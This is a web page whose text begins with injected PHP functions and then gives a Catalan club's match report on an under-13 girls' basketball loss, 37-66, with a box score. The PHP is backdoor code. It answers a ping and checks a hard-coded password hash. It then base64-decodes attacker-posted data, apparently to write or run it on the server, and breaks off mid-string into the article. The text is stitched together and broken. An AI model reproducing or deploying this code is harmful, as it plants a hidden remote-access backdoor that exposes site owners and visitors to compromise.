function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení 07 A no pot amb el líder imbatut de la lliga, el SESE (37-66) - Tgn Bàsquet Club -

L’infantil femení 07 A no pot amb el líder imbatut de la lliga, el SESE (37-66)

Updated: gener 14, 2020

L’equip infantil femení 07 A va perdre clarament contra el líder invicte de la competició, el SESE (37-66). Les liles van fer uns bons primers minuts, amb una defensa intensa que va dificultar els atacs visitants. Amb tot, el TGN Bàsquet no podia anotar amb fluïdesa perquè la defensa del SESE també era molt bona. Tot va començar a decidir-se en el segon quart quan la defensa visitant i els seus contraatacs van trencar el matx amb un parcial de 5-18 (18-38 al descans).  A la represa, les tarragonines no van llençar la tovallola i, amb una bona defensa, van equilibrar el partit en aquell període. Amb tot, la falta d’encert ofensiu va evitar que el TGN Bàsquet retallés diferències i tingués oportunitats de remuntada.

TGN BÀSQUET   37

SESE  66

TGN BÀSQUET: Amela (11), Corbacho (4), Rubio (9), Alvaro (2), Salvadó (1) -cinc inicial- Iglesias (3), Carmona (2), Galán (2) i Lopez (3). 2 triples: Amela i Iglesias. Tirs lliures: 3/9. Faltes: 24. Eliminats: Alvaro 29′, Rubio 33′ i Corbacho 37′.

SESE: Chuecos (4), Xicoira (14), Gol, Leon (8), Alonso (4) -cinc inicial- Farrerons (4), Agullo (11), Castañar (2), Moreno (4), Caules (10), Kasem (3) i Garcia (2). 1 triple: Alonso. Tirs lliures: 9/24. Faltes: 13. Eliminats: Cap.

PARCIALS: 13-20, 5-18 (18-38 al descans), 11-12 i 8-16.

ÀRBITRE: Beltrán.